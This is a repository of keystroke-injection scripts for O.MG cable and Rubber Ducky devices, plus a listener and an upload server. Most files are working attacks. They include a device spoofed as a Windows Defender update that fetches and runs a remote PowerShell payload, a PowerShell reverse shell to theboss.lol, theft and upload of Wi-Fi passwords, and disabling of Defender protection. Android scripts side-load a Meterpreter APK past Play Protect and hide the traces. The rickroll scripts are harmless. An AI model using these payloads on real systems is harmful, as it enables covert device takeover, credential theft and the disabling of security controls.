├── LICENSE
├── SimpleHTTPPutServer
├── Start ncat
├── o.mg script 1: notepad
├── o.mg script 2: open web browser
├── o.mg script 3: backdoor
├── o.mg script 4: copy wifi details
├── omg_android9SGS8_meterpreter
├── omg_androidS22Ultra.txt
├── omg_android_phone_call
├── omg_android_rickroll
├── omg_android_take_photos
├── omg_apple_macos_login_and_rickroll
├── omg_ios_rickroll
├── omg_linux_login_and_rickroll
├── payload.ps1
├── rubber ducky reverse shell
└── turn off windows defender with powershell


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2020 davidbombal
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/SimpleHTTPPutServer:
--------------------------------------------------------------------------------
 1 | # Use this command to start the server on port 80: sudo python SimpleHTTPPutServer 80
 2 | 
 3 | import SimpleHTTPServer
 4 | import BaseHTTPServer
 5 | 
 6 | class SputHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
 7 |     def do_PUT(self):
 8 |         print self.headers
 9 |         length = int(self.headers["Content-Length"])
10 |         path = self.translate_path(self.path)
11 |         with open(path, "wb") as dst:
12 |             dst.write(self.rfile.read(length))
13 | 
14 | 
15 | if __name__ == '__main__':
16 |     SimpleHTTPServer.test(HandlerClass=SputHTTPRequestHandler)
17 | 
18 | 


--------------------------------------------------------------------------------
/Start ncat:
--------------------------------------------------------------------------------
1 | #Use this command to start ncat on port 4444:
2 | 
3 | nc -lp 4444
4 | 


--------------------------------------------------------------------------------
/o.mg script 1: notepad:
--------------------------------------------------------------------------------
 1 | REM Script 1:
 2 | REM =========
 3 | REM ~~ | Open Notepad and write something:
 4 | DELAY 1000
 5 | GUI r
 6 | DELAY 100
 7 | STRING notepad.exe
 8 | ENTER
 9 | DELAY 1000
10 | STRING You have been hacked
11 | 
12 | 


--------------------------------------------------------------------------------
/o.mg script 2: open web browser:
--------------------------------------------------------------------------------
 1 | REM Script 2:
 2 | REM =========
 3 | VID 045E
 4 | PID 0048
 5 | MAN Microsoft
 6 | PRO Windows Defender Update
 7 | GUI r
 8 | DELAY 1000
 9 | REM ~~ | Change line below to desired browser: chrome, firefox, iexplore, etc.
10 | STRING chrome
11 | ENTER
12 | DELAY 4000
13 | REM | Alt+D below moves cursor focus to the URL bar. This is needed for Internet Explorer and Edge (Does not impact Chrome or Firefox)
14 | ALT d
15 | REM ~~ | Change line below to desired URL
16 | STRING https://youtu.be/QHwPaLChvgw
17 | ENTER
18 | REM ~~ | Change line below to "GUI UP" to maximize screen. Change line below to "F11" to fullscreen.
19 | F11
20 | 


--------------------------------------------------------------------------------
/o.mg script 3: backdoor:
--------------------------------------------------------------------------------
 1 | REM Script 3:
 2 | REM =========
 3 | DELAY 1000
 4 | GUI r
 5 | DELAY 100
 6 | STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://theboss.lol/payload.ps1');"
 7 | ENTER
 8 | STRING exit
 9 | ENTER
10 | 


--------------------------------------------------------------------------------
/o.mg script 4: copy wifi details:
--------------------------------------------------------------------------------
 1 | REM =========
 2 | REM Script 4:
 3 | REM =========
 4 | REM | Win-Get_SSID_Info-HTTP
 5 | REM |
 6 | REM | This script will gather the user's Wifi SSID profiles (including any PSK's/passcodes), zip them up,
 7 | REM | then upload them to some public HTTP server via PUT.
 8 | REM |
 9 | REM | This does require you setting up a HTTP server to receive the files, see comments in the script lines.
10 | REM |
11 | REM | See all "REM ~~" tilde lines below for code that needs to be modified!
12 | REM |
13 | REM | Based on ideas from dantedmc4 / Dante Sparda
14 | REM | https://github.com/dantedmc4/poundplay
15 | REM |
16 | REM | Written by JeffTadashi
17 | REM | https://github.com/JeffTadashi/omducky/
18 | REM |
19 | VID 045E
20 | PID 0048
21 | MAN Microsoft
22 | PRO Windows Defender Update
23 | GUI r
24 | DELAY 1000
25 | STRING powershell
26 | ENTER
27 | DELAY 2000
28 | REM | Export wlan profiles into xml files (including clear-test PSK's) into current directory
29 | STRING netsh wlan export profile key=clear
30 | ENTER
31 | REM | Collect all xml files into a single zip file
32 | STRING Compress-Archive -U -Path .\*.xml -DestinationPath temp.zip
33 | ENTER
34 | DELAY 3000
35 | STRING Invoke-Restmethod -Uri http://theboss.lol/temp.zip -Method Put -Infile .\temp.zip
36 | ENTER
37 | DELAY 2000
38 | REM | File cleanup and exit...
39 | STRING rm .\temp.zip
40 | ENTER
41 | STRING rm .\*.xml
42 | ENTER
43 | STRING exit
44 | ENTER
45 | 


--------------------------------------------------------------------------------
/omg_android9SGS8_meterpreter:
--------------------------------------------------------------------------------
  1 | REM # -----------------------------------------------------------
  2 | REM # Title: OMG Android Meterpreter
  3 | REM # Description: Download and install an APK on Android. 
  4 | REM # You may need to change the script for your particular phone
  5 | REM # model and Android version. Play around with it. Delays are very
  6 | REM # important and makes a really big difference. 
  7 | REM # 
  8 | REM # Author: David Bombal 
  9 | REM # Target: Android 9 (Samsung Galaxy S8+)
 10 | REM # Notes: Set URL for APK payload below
 11 | REM # -----------------------------------------------------------
 12 | 
 13 | REM # -----------------------------------------------------------
 14 | REM # clear screen (Not needed, but helps for demos)
 15 | REM # -----------------------------------------------------------
 16 | 
 17 | GUI ENTER
 18 | DELAY 1000
 19 | GUI ENTER
 20 | 
 21 | REM # -----------------------------------------------------------
 22 | REM # launch browser and download apk
 23 | REM # -----------------------------------------------------------
 24 | 
 25 | GUI b
 26 | DELAY 1000
 27 | CTRL l
 28 | DELAY 50
 29 | STRING http://xxx.xxx.xxx.xxx:8000/omg.apk
 30 | ENTER
 31 | DELAY 4000
 32 | 
 33 | REM # -----------------------------------------------------------
 34 | REM # open apk with My Files
 35 | REM # -----------------------------------------------------------
 36 | 
 37 | GUI r
 38 | DELAY 500
 39 | ENTER
 40 | DELAY 500
 41 | TAB
 42 | TAB
 43 | DELAY 500
 44 | ENTER
 45 | DELAY 1000
 46 | CTRL f
 47 | DOWN
 48 | DOWN
 49 | ENTER
 50 | TAB
 51 | ENTER
 52 | DELAY 2000
 53 | 
 54 | REM # -----------------------------------------------------------
 55 | REM # Do you want to install MainActivity
 56 | REM # -----------------------------------------------------------
 57 | 
 58 | DOWN
 59 | DOWN
 60 | DOWN
 61 | DOWN
 62 | DOWN
 63 | DOWN
 64 | DOWN
 65 | DOWN
 66 | DOWN
 67 | DOWN
 68 | DOWN
 69 | DOWN
 70 | DOWN
 71 | DOWN
 72 | DOWN
 73 | DOWN
 74 | DOWN
 75 | TAB
 76 | RIGHT
 77 | ENTER
 78 | 
 79 | REM # -----------------------------------------------------------
 80 | REM # Blocked by Play Protect. Install anyway.
 81 | REM # -----------------------------------------------------------
 82 | 
 83 | DELAY 5000
 84 | DOWN
 85 | LEFT
 86 | ENTER
 87 | 
 88 | REM # -----------------------------------------------------------
 89 | REM # Open application, after installation.
 90 | REM # -----------------------------------------------------------
 91 | 
 92 | DELAY 10000
 93 | DOWN
 94 | CTRL f
 95 | TAB
 96 | ENTER
 97 | ENTER
 98 | 
 99 | # REM Credit goes to _MG_, and DrewSec for the Android 11 and 12 versions which inspired this. 
100 | 


--------------------------------------------------------------------------------
/omg_androidS22Ultra.txt:
--------------------------------------------------------------------------------
  1 | REM # -----------------------------------------------------------
  2 | REM # Title: OMG Android Meterpreter
  3 | REM # Description: Download and install an APK on Android.
  4 | REM # You may need to change the script for your particular phone
  5 | REM # model and Android version. Play around with it. Delays are very
  6 | REM # important and makes a really big difference.
  7 | REM #
  8 | REM # Author: David Bombal
  9 | REM # Target: Android 12 (Samsung Galaxy S22 Ultra)
 10 | REM # Notes: Set URL for APK payload below
 11 | REM # -----------------------------------------------------------
 12 | 
 13 | REM # -----------------------------------------------------------
 14 | REM # clear screen (Not needed, but helps for demos)
 15 | REM # -----------------------------------------------------------
 16 | 
 17 | GUI ENTER
 18 | DELAY 1000
 19 | GUI ENTER
 20 | 
 21 | REM # -----------------------------------------------------------
 22 | REM # launch browser and download apk
 23 | REM # -----------------------------------------------------------
 24 | 
 25 | GUI b
 26 | DELAY 1000
 27 | CTRL l
 28 | STRING http://xx.xx.xx.xx:8000/omg.apk
 29 | ENTER
 30 | DELAY 4000
 31 | ENTER
 32 | DELAY 2000
 33 | 
 34 | REM # -----------------------------------------------------------
 35 | REM # open apk with My Files
 36 | REM # -----------------------------------------------------------
 37 | 
 38 | GUI r
 39 | DELAY 100
 40 | TAB
 41 | DELAY 100
 42 | TAB
 43 | DELAY 100
 44 | TAB
 45 | DELAY 100
 46 | TAB
 47 | DELAY 100
 48 | TAB
 49 | DELAY 100
 50 | TAB
 51 | DELAY 100
 52 | ENTER
 53 | DELAY 100
 54 | ENTER
 55 | DELAY 100
 56 | TAB
 57 | DELAY 100
 58 | ENTER
 59 | 
 60 | REM # -----------------------------------------------------------
 61 | REM # blocked by Play Protect
 62 | REM # -----------------------------------------------------------
 63 | DELAY 100
 64 | TAB
 65 | DELAY 1000
 66 | TAB
 67 | DELAY 1000
 68 | ENTER
 69 | DELAY 1000
 70 | TAB
 71 | DELAY 1000
 72 | TAB
 73 | DELAY 1000
 74 | ENTER
 75 | 
 76 | REM # -----------------------------------------------------------
 77 | REM # Run App
 78 | REM # -----------------------------------------------------------
 79 | 
 80 | DELAY 8000
 81 | ENTER
 82 | 
 83 | REM # -----------------------------------------------------------
 84 | REM # Give Access to All
 85 | REM # -----------------------------------------------------------
 86 | 
 87 | DELAY 500
 88 | TAB
 89 | DELAY 500
 90 | TAB
 91 | DELAY 500
 92 | TAB
 93 | DELAY 500
 94 | TAB
 95 | DELAY 500
 96 | TAB
 97 | DELAY 500
 98 | TAB
 99 | DELAY 500
100 | TAB
101 | DELAY 500
102 | TAB
103 | DELAY 500
104 | TAB
105 | DELAY 500
106 | ENTER
107 | DELAY 500
108 | TAB
109 | ENTER
110 | 
111 | REM # -----------------------------------------------------------
112 | REM # clear screen (So they can't see we were on their phone)
113 | REM # -----------------------------------------------------------
114 | 
115 | GUI ENTER
116 | DELAY 1000
117 | GUI ENTER
118 | 


--------------------------------------------------------------------------------
/omg_android_phone_call:
--------------------------------------------------------------------------------
 1 | TAB
 2 | DELAY 250
 3 | GUI c
 4 | DELAY 500
 5 | CTRL f
 6 | DELAY 250
 7 | STRING 123
 8 | DELAY 500
 9 | ENTER
10 | DELAY 250
11 | TAB
12 | ENTER
13 | DELAY 250
14 | TAB
15 | TAB
16 | LEFT
17 | ENTER
18 | 
19 | REM Change 123 to the number you want to call
20 | REM You use at your own risk
21 | REM May not work, and may require work
22 | 


--------------------------------------------------------------------------------
/omg_android_rickroll:
--------------------------------------------------------------------------------
 1 | TAB
 2 | DELAY 250
 3 | GUI b
 4 | DELAY 250
 5 | CTRL SHIFT n
 6 | DELAY 500
 7 | CTRL l
 8 | DELAY 1000
 9 | STRING https://youtu.be/dQw4w9WgXcQ
10 | ENTER
11 | 
12 | REM Credit for this script goes to MG: https://twitter.com/_mg_
13 | 


--------------------------------------------------------------------------------
/omg_android_take_photos:
--------------------------------------------------------------------------------
 1 | TAB
 2 | DELAY 250
 3 | GUI f
 4 | DELAY 350
 5 | CTRL l
 6 | LEFT
 7 | STRING camera
 8 | DELAY 300
 9 | ENTER
10 | ENTER
11 | DELAY 300
12 | ENTER
13 | ENTER
14 | DELAY 300
15 | ENTER
16 | ENTER
17 | DOWN
18 | ENTER
19 | DOWN
20 | ENTER
21 | 
22 | REM You use at your own risk
23 | REM May not work, and may require work
24 | 


--------------------------------------------------------------------------------
/omg_apple_macos_login_and_rickroll:
--------------------------------------------------------------------------------
 1 | VID 05AC
 2 | PID 0263
 3 | UPARROW
 4 | DELAY 2000
 5 | STRING SecretPassword
 6 | ENTER
 7 | DELAY 2000
 8 | GUI SPACE
 9 | DELAY 500
10 | STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ 
11 | DELAY 1000
12 | ENTER
13 | ENTER
14 | TAB
15 | ENTER
16 | 
17 | REM Credit for this script goes to MG: https://twitter.com/_mg_
18 | 


--------------------------------------------------------------------------------
/omg_ios_rickroll:
--------------------------------------------------------------------------------
 1 | GUI SPACE
 2 | DELETE
 3 | DELAY 100
 4 | STRING safari
 5 | ENTER
 6 | DELAY 500
 7 | GUI l
 8 | DELAY 100
 9 | STRING https://youtu.be/dQw4w9WgXcQ
10 | DELAY 100
11 | ENTER
12 | ESC
13 | 
14 | REM Credit for this script goes to MG: https://twitter.com/_mg_
15 | 


--------------------------------------------------------------------------------
/omg_linux_login_and_rickroll:
--------------------------------------------------------------------------------
 1 | VID 05AC
 2 | PID 0263
 3 | UPARROW
 4 | DELAY 2000
 5 | ENTER
 6 | DELAY 2000
 7 | STRING SecretPassword
 8 | ENTER
 9 | DELAY 5000
10 | ALT F2
11 | DELAY 50
12 | STRING firefox
13 | DELAY 50
14 | ENTER
15 | DELAY 2000
16 | STRING https://www.youtube.com/watch?v=dQw4w9WgXc
17 | ENTER
18 | ENTER
19 | TAB
20 | ENTER
21 | DELAY 2000
22 | F
23 | 
24 | REM I would not have been able to create this script without MG's help. Thanks MG! https://twitter.com/_mg_
25 | 


--------------------------------------------------------------------------------
/payload.ps1:
--------------------------------------------------------------------------------
1 | #Change the domain name theboss.lol to your domain name and the port number 4444 to the port number ncat is listening to
2 | 
3 | $sm=(New-Object Net.Sockets.TCPClient('theboss.lol',4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
4 | 


--------------------------------------------------------------------------------
/rubber ducky reverse shell:
--------------------------------------------------------------------------------
 1 | REM Turn off Windows Defender and start reverse shell
 2 | REM
 3 | DELAY 1000
 4 | GUI r
 5 | DELAY 200
 6 | REM Start an elevated powershell instance which will disable Windows Defender.
 7 | STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs
 8 | ENTER
 9 | DELAY 1000
10 | REM if you need administrator [left, enter and delay 1000]
11 | LEFT
12 | ENTER
13 | DELAY 1000
14 | ALT y
15 | DELAY 1000
16 | GUI r
17 | DELAY 100
18 | STRING powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('http://theboss.lol/payload.ps1');"
19 | ENTER
20 | STRING exit
21 | ENTER
22 | 


--------------------------------------------------------------------------------
/turn off windows defender with powershell:
--------------------------------------------------------------------------------
 1 | REM Turn off Windows Defender
 2 | REM
 3 | DELAY 1000
 4 | GUI r
 5 | DELAY 200
 6 | REM Start an elevated powershell instance which will disable Windows Defender.
 7 | STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs
 8 | ENTER
 9 | DELAY 1000
10 | REM if you need administrator [left, enter and delay 1000]
11 | LEFT
12 | ENTER
13 | DELAY 1000
14 | ALT y
15 | 


--------------------------------------------------------------------------------